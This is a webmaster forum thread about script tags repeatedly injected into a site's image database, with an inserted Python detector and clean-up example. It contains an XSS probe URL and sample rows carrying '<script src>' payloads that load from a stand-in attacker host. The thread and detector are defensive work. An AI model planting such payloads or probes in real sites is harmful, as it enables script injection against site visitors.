On Friday we started having some weird activity where pending images were being flagged as viruses by our internal scanners. I didn't think too much of it until I looked into the image table today and saw that almost every pending image in the table has a script src=" followed by http:// and f1y.in and j.js (I don't want to post the whole code as it is in case it does something), and then of course it closes with a </script> tag.
When I try to go to the f1y domain I get a browser warning which won't let me access it because of suspicious activity - spyware and the like.
I've done searches on this code but can't find anyone else who's seen it; however, I see lots of sites infected with it. I guess it's an infection.
Anyways, want to see if anyone else has seen this code?
It sounds like your site is vulnerable to MySQL injection or cross-site scripting, or both.
Try this test, swapping example.com for your site, "yourscript.cgi" for your script (probably .php), and "login_name" for any form variable in your input scripts. For example, if you have a search script with the input field named "term," swap out "login_name" for "term":
http://www.example.com/yourscript.cgi?login_name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%22
This test is harmless; if your site is vulnerable it will elicit a simple alert, "123." But what it tells you is that data is passed through from input and echoed back to the page unfiltered, meaning a hacker can do the same thing to inject data into your database or craft a URL for cross-site scripting.
This is a problem with your scripts and improperly cleansed input data.
A second possibility is that the site was hacked and someone has gained access to your site via FTP or just your database, but most often it's not even necessary.
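The thread describes stored payloads of the shape `<script src="http://…/j.js"></script>` appended to fields in the pending-image table, and the reply above points out that the real fix is filtering input and escaping output. The following is an added example, not code from anyone in the thread: it scans constructed sample rows for that payload shape, strips it from existing records, and escapes values on output so a residual tag renders as text instead of executing. The domain `attacker.example` and the row layout are assumptions; `j.js` is the script name from the thread.

```python
import html
import re

# Constructed sample rows standing in for the thread's "pending images" table.
# Two rows carry an appended external <script src=...> tag; the domain is a
# placeholder, not the one named in the thread.
SAMPLE_ROWS = [
    {"id": 101, "caption": "Front view", "filename": "front.jpg"},
    {"id": 102, "caption": "Side view",
     "filename": 'side.jpg<script src="http://attacker.example/j.js"></script>'},
    {"id": 103, "caption": 'Logo <SCRIPT SRC=http://attacker.example/j.js></SCRIPT>',
     "filename": "logo.png"},
]

# A script tag whose src is an absolute http(s) URL: the payload shape the
# thread describes. Case-insensitive, tolerant of missing quotes.
INJECTED_SCRIPT = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)[^>]*>.*?</script\s*>',
    re.IGNORECASE | re.DOTALL,
)


def find_injected(rows):
    """Return (row id, field name, external src URL) for every field carrying a payload."""
    hits = []
    for row in rows:
        for field, value in row.items():
            if not isinstance(value, str):
                continue
            for match in INJECTED_SCRIPT.finditer(value):
                hits.append((row["id"], field, match.group(1)))
    return hits


def strip_injected(value):
    """Remove injected script tags from a stored value (clean-up of already-infected rows)."""
    return INJECTED_SCRIPT.sub("", value)


def render_field(value):
    """Escape a stored value for HTML output. Escaping at output time is what stops
    a stored payload from executing even if a clean-up pass missed it."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for row_id, field, src in find_injected(SAMPLE_ROWS):
        print(f"row {row_id} field {field!r} loads an external script from {src}")
```

Running the detector against the real table (via whatever DB driver the site uses) gives the list of affected records the poster was cleaning by hand, and re-running it daily shows whether the re-insertion has stopped.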
I don't know if it's a SQL injection though, but it could be XSS. The reason I say that is because this script is only filled into certain fields, some of which aren't accessible by the form (it's a multi-page .NET signup form). The form is a page which allows image uploads. It is the 3rd page of the series - and many of the fields in the previous pages are text fields, yet they aren't populated with this string.
The other thing is that I cleaned the entries that had the script in them yesterday, and today they were all back attached to the same records in the same places.
Perhaps I'm wrong about it being a SQL injection, but its persistence concerns me.
I did a Google search for "f1y j.js" as f1y is the domain and the script name is j.js, and I see lots of other sites seem to be infected and don't even know it.
It's just a strange thing for me because it first seems to have appeared Friday, and "stopped" (for lack of a better term) Monday; however today (Wednesday) it re-infected the exact same records, leaving new ones - ones created since Monday.
I'm going to continue to monitor it, and we are dealing with the images individually so I'll see what happens moving forward.
Thanks again for your input - if I find out more about this thing I'll post it here.
[microsoft.com...]
Somehow this thing is re-inserting itself. Mind you we didn't quite get the old images processed so perhaps when we get that done this will stop?
Also noticed the ActiveX killbits update for Windows 2000, even though MS says Win2k isn't affected - I applied it so we'll see if perhaps that helps.